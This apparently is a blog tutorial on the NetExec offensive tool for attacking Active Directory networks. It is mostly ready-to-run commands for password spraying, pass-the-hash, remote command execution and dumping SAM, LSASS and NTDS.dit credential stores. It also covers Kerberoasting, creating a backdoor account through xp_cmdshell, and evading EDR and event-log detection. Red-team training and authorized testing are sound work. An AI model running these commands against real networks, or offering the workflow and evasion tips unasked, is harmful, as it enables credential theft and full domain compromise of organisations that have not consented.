CrackMapExec is dead. Long live NetExec.
If you’ve been in offensive security for more than a few years, CrackMapExec (CME) was probably one of the first tools you learned. It became the go-to for Active Directory enumeration, credential testing, and lateral movement — packed into a single framework with clean output and a protocol-agnostic design.
In 2023, the original author archived the project. The community forked it and kept building under a new name: NetExec (nxc). Same DNA, actively maintained, and compatible with everything CME could do.
This guide covers it all: installation, every major protocol, credential attacks, lateral movement, and how to integrate NetExec into a real-world red team engagement in 2026.
What Is NetExec?
NetExec is a Swiss Army knife for Active Directory offensive operations. It lets you:
- Enumerate hosts, users, shares, policies across SMB, LDAP, WinRM, MSSQL, RDP, SSH, FTP, and more
- Test credentials across large networks efficiently
- Execute commands remotely with valid credentials
- Dump SAM, LSA, NTDS, and other credential stores
- Perform pass-the-hash and pass-the-ticket attacks
- Map attack paths across entire domains
It’s built in Python, runs on Linux, and outputs clean color-coded results. Green means success. Red means failure. Yellow is typically informational. Once you learn the output pattern, you can process results from hundreds of hosts fast.
GitHub: https://github.com/Pennyw0rth/NetExec
Installation
Recommended: pipx (cleanest method)
sudo apt update && sudo apt install -y pipx
pipx install netexec
pipx ensurepath
Restart your shell or source your profile, then verify:
nxc --version
From source
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install .
nxc --version
Kali Linux (apt)
sudo apt update
sudo apt install netexec
Kali’s package may lag behind the latest release. For active engagements, use pipx to stay current.
Core Concepts
Before diving into protocols, understand NetExec’s command structure:
nxc <protocol> <target(s)> [options]
Protocols: smb, ldap, winrm, mssql, rdp, ssh, ftp, vnc, wmi
Target formats:
nxc smb 192.168.1.10 # Single host
nxc smb 192.168.1.0/24 # Subnet
nxc smb 192.168.1.1-50 # Range
nxc smb targets.txt # File of targets
Credential formats:
-u username -p password # Plaintext
-u username -H NTLM_HASH # Pass-the-hash
-u users.txt -p 'Password123' # User list spray
-u users.txt -p passwords.txt # Credential stuffing
--no-bruteforce # Pair user:pass (same index)
SMB — The Core Protocol
SMB is where most AD engagements start. NetExec makes it painless.
Host discovery and OS fingerprinting
nxc smb 192.168.1.0/24
This gives you hostname, OS version, domain, SMB signing status — no credentials required. SMB signing disabled means relay attacks are viable.
Null session enumeration
nxc smb 192.168.1.10 -u '' -p '' --shares
nxc smb 192.168.1.10 -u '' -p '' --users
nxc smb 192.168.1.10 -u '' -p '' --groups
Some environments allow guest or null sessions. Always check.
Validate credentials
nxc smb 192.168.1.0/24 -u administrator -p 'Summer2026!'
Green [+] means valid. (Pwn3d!) means local admin. That’s the money shot.
Enumerate shares
nxc smb 192.168.1.10 -u jsmith -p 'Password1' --shares
Look for non-default shares: SYSVOL has GPO data, NETLOGON has scripts, and custom shares often have sensitive files.
Spider shares for interesting files
nxc smb 192.168.1.10 -u jsmith -p 'Password1' -M spider_plus
nxc smb 192.168.1.10 -u jsmith -p 'Password1' -M spider_plus -o READ_ONLY=false
spider_plus recursively indexes shares. Add -o READ_ONLY=false to download files directly.
List logged-on users
nxc smb 192.168.1.10 -u jsmith -p 'Password1' --loggedon-users
Shows who’s currently logged in. Key for finding session targets — if a DA is logged onto a workstation, that’s your path.
Enumerate domain users from SMB
nxc smb 192.168.1.10 -u jsmith -p 'Password1' --users
Password Spraying
Password spraying is testing one (or a few) passwords against many users. Low lockout risk if done correctly.
Single password spray
nxc smb 192.168.1.0/24 -u users.txt -p 'Summer2026!' --continue-on-success
--continue-on-success keeps going after a hit — essential for sprays.
Check lockout policy first
nxc smb 192.168.1.10 -u jsmith -p 'Password1' --pass-pol
Always check the domain password policy before spraying. Know the lockout threshold and observation window.
Smart spray timing
If the policy locks after 5 attempts in 30 minutes, space sprays at least 31 minutes apart. A common cadence:
- Spray attempt 1 → wait 31 minutes
- Spray attempt 2 → wait 31 minutes
- Continue…
Multiple passwords without brute force
# Test user1:pass1, user2:pass2 (no cross-matching)
nxc smb 192.168.1.10 -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
Pass-the-Hash
No plaintext password? No problem. NTLM hashes work directly.
nxc smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
The hash format is LM:NT. For modern systems, LM is disabled — use aad3b435b51404eeaad3b435b51404ee (empty LM hash) plus the actual NT hash.
Check for local admin reuse across subnet
nxc smb 192.168.1.0/24 -u administrator -H <NT_HASH> --local-auth
--local-auth tests against local accounts instead of domain accounts. This is the classic local admin reuse check — if the same local admin hash works on 40 machines, you have lateral movement everywhere.
Remote Execution
Once you have valid credentials and local admin, you can execute commands.
Command execution via SMB
nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "whoami"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "net user"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -x "ipconfig /all"
PowerShell execution
nxc smb 192.168.1.10 -u administrator -p 'Password1' -X "Get-Process"
nxc smb 192.168.1.10 -u administrator -p 'Password1' -X "Get-ADUser -Filter * | Select Name,SamAccountName"
Execute across subnet
nxc smb 192.168.1.0/24 -u administrator -p 'Password1' -x "hostname" --no-output
Credential Dumping
This is where NetExec gets dangerous. With local admin, you can pull credential stores.
SAM database (local accounts)
nxc smb 192.168.1.10 -u administrator -p 'Password1' --sam
Dumps local user hashes from the SAM database.
LSA secrets
nxc smb 192.168.1.10 -u administrator -p 'Password1' --lsa
LSA secrets can contain service account credentials, autologon passwords, and cached domain credentials.
LSASS memory (live credentials)
nxc smb 192.168.1.10 -u administrator -p 'Password1' -M lsassy
nxc smb 192.168.1.10 -u administrator -p 'Password1' -M nanodump
These modules extract credentials from LSASS memory. lsassy is the most common. You’ll get NTLM hashes, and in some cases cleartext passwords (Kerberos tickets, WDigest if enabled).
NTDS.dit (domain controller — all domain hashes)
nxc smb 192.168.1.10 -u administrator -p 'Password1' --ntds
Run this against a DC. It dumps the entire NTDS.dit — every domain account hash. This is full domain compromise in a single command.
Run against whole subnet
nxc smb 192.168.1.0/24 -u administrator -H <NT_HASH> --sam --continue-on-success
Dump SAM from every machine where the hash works. Collect unique hashes and start cracking or passing.
LDAP Enumeration
LDAP gives you everything the domain controller knows. With valid domain credentials, it’s a goldmine.
Basic domain info
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --info
Enumerate users
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --users
Find AS-REP roastable accounts
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --asreproast output.txt
Finds accounts with “Do not require Kerberos preauthentication” set. Crack the resulting hashes offline with Hashcat.
Find Kerberoastable accounts
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --kerberoasting output.txt
Gets TGS tickets for all SPNs. Crack with Hashcat (-m 13100). Service accounts often have weak passwords.
Find users with unconstrained delegation
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --trusted-for-delegation
Machines or users with unconstrained delegation are high-value targets — any TGT that hits them can be captured.
Password in description field
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' -M get-desc-users
Surprisingly common. Help desk sets a password in the user description field and forgets it.
Find domain admins
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --groups "Domain Admins"
WinRM
WinRM gives you a PowerShell shell over HTTP(S). If a user is in the Remote Management Users group, you’re in.
nxc winrm 192.168.1.0/24 -u jsmith -p 'Password1'
(Pwn3d!) means WinRM access confirmed. Drop into a shell with Evil-WinRM:
evil-winrm -i 192.168.1.10 -u jsmith -p 'Password1'
Pass-the-hash with WinRM:
nxc winrm 192.168.1.10 -u administrator -H <NT_HASH>
evil-winrm -i 192.168.1.10 -u administrator -H <NT_HASH>
MSSQL
SQL Server is common in enterprise environments and often runs as a privileged service account.
Enumerate SQL servers
nxc mssql 192.168.1.0/24
Authenticate
nxc mssql 192.168.1.10 -u sa -p 'Password1'
nxc mssql 192.168.1.10 -u 'DOMAIN\jsmith' -p 'Password1' --windows-auth
Execute OS commands via xp_cmdshell
nxc mssql 192.168.1.10 -u sa -p 'Password1' -x "whoami"
nxc mssql 192.168.1.10 -u sa -p 'Password1' -x "net user hacker P@ssw0rd /add"
xp_cmdshell runs commands as the SQL service account. If that’s NT AUTHORITY\SYSTEM or a domain service account, the game changes fast.
RDP
nxc rdp 192.168.1.0/24 -u administrator -p 'Password1'
Validates RDP access. Does not open a GUI session. Use xfreerdp or Remmina for interactive access:
xfreerdp /u:administrator /p:'Password1' /v:192.168.1.10
SSH
nxc ssh 192.168.1.0/24 -u root -p 'toor'
nxc ssh 192.168.1.0/24 -u admin -p passwords.txt --continue-on-success
Working With Modules
NetExec has a growing module library. List all available modules:
nxc smb -L
nxc ldap -L
nxc mssql -L
Notable SMB modules
| Module | Description |
|---|---|
lsassy | Dump LSASS credentials |
nanodump | Stealthy LSASS dump |
spider_plus | Recursively index all shares |
get_netconnections | Active network connections |
handlekatz | LSASS dump via handle duplication |
procdump | Dump LSASS via procdump |
bloodhound | Collect BloodHound data |
Notable LDAP modules
| Module | Description |
|---|---|
get-desc-users | Find passwords in description fields |
maq | Machine account quota |
pre2k | Pre-Windows 2000 compat accounts |
adcs | Enumerate ADCS (certificate services) |
Running a module
nxc smb 192.168.1.10 -u administrator -p 'Password1' -M lsassy
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' -M adcs
Pass module options with -o:
nxc smb 192.168.1.10 -u administrator -p 'Password1' -M spider_plus -o READ_ONLY=false DOWNLOAD_FLAG=true
BloodHound Collection via NetExec
NetExec can collect BloodHound data directly:
nxc ldap 192.168.1.10 -u jsmith -p 'Password1' --bloodhound -ns 192.168.1.10 -c All
This collects users, groups, computers, sessions, ACLs, and trusts — all from a single command. Drop the JSON files into BloodHound for attack path analysis.
See the BloodHound Complete Guide for full analysis workflow.
NetExec Database
Every result NetExec finds goes into a local SQLite database. Query it anytime:
nxc smb --list-hosts # All discovered hosts
nxc smb --list-creds # All valid credentials
Or query directly:
nxcdb
The database persists across runs. You can come back to it mid-engagement without re-running everything.
Practical Attack Workflow
Here’s how NetExec fits into a real engagement:
Phase 1: Discovery (no creds)
# Find hosts, OS versions, SMB signing
nxc smb 10.10.10.0/24
# Try null sessions
nxc smb 10.10.10.0/24 -u '' -p '' --shares
nxc smb 10.10.10.0/24 -u '' -p '' --users
Phase 2: Initial foothold
# Check password policy
nxc smb 10.10.10.10 -u '' -p '' --pass-pol
# Password spray (after reviewing policy)
nxc smb 10.10.10.0/24 -u users.txt -p 'Summer2026!' --continue-on-success
Phase 3: Enumerate as domain user
# Map domain
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --users --groups
# Find attack paths
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --kerberoasting kerberoast.txt
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --asreproast asrep.txt
nxc ldap 10.10.10.10 -u jsmith -p 'Summer2026!' --trusted-for-delegation
Phase 4: Lateral movement
# Check local admin across subnet
nxc smb 10.10.10.0/24 -u jsmith -p 'Summer2026!' --local-auth
# Where is admin logged on? Find active sessions
nxc smb 10.10.10.0/24 -u jsmith -p 'Summer2026!' --loggedon-users
# Dump creds where you have admin
nxc smb 10.10.10.10 -u jsmith -p 'Summer2026!' -M lsassy
Phase 5: Domain escalation
# Pass hashes found in lsassy output
nxc smb 10.10.10.0/24 -u administrator -H <HASH> --local-auth
# Hit the DC with NTDS dump
nxc smb 10.10.10.1 -u administrator -p 'Password1' --ntds
Evasion Considerations
NetExec is noisy by default. Event IDs 4624, 4625, 4776 fire on every auth attempt. For stealth-focused engagements:
- Slow down credential tests. Add sleep between attempts.
- Avoid mass sprays against EDR-protected hosts. Behavioral detections catch high-volume auth events.
- Use Kerberos authentication where possible — quieter than NTLM.
- Limit LSASS interaction. Use modules like
nanodumporhandlekatzthat avoid direct LSASS reads when EDR is present. - Stick to LDAP for enumeration over SMB when possible — fewer events, same data.
# Kerberos auth (set /etc/hosts or use --kdcHost)
nxc smb 10.10.10.10 -u jsmith -p 'Password1' --kerberos
CME vs NetExec: What Changed?
If you’re migrating from CrackMapExec:
| CrackMapExec | NetExec |
|---|---|
cme | nxc |
crackmapexec | netexec |
| Same modules | Expanded module library |
| Archived, no updates | Actively maintained |
Everything else is essentially the same. Commands are nearly identical. Muscle memory transfers.
Practice Lab Setup
You need a real AD lab to practice. Options:
- Vultr or DigitalOcean — Spin up Windows Server 2022 + client VMs fast. Cheaper than running physical hardware. Get $100 on Vultr →
- GOAD (Game of Active Directory) — Pre-built vulnerable AD lab you can deploy locally or on a VPS
- Hack The Box / Pro Labs — Realistic enterprise environments, no setup required
For VPS-based labs, see the VPS vs Home Lab guide .
Summary
NetExec is the living successor to CrackMapExec. If you work in Active Directory environments — offensive or defensive — you need to know this tool cold.
The workflow is consistent: discover hosts, spray credentials carefully, enumerate as a domain user, find privilege escalation paths, and move laterally until you reach the objectives. NetExec does most of the heavy lifting.
It also pairs naturally with BloodHound (for visualizing attack paths) and tools like Impacket, Mimikatz, and Evil-WinRM for execution and persistence. For a full AD attack sequence, see the Active Directory Lateral Movement playbook when it publishes.
Need Professional-Grade Security Content?
If you’re building a security program and need high-quality technical content — blog posts, whitepapers, training materials — check out CipherWrite . Cybersecurity content written by practitioners, not generalists.
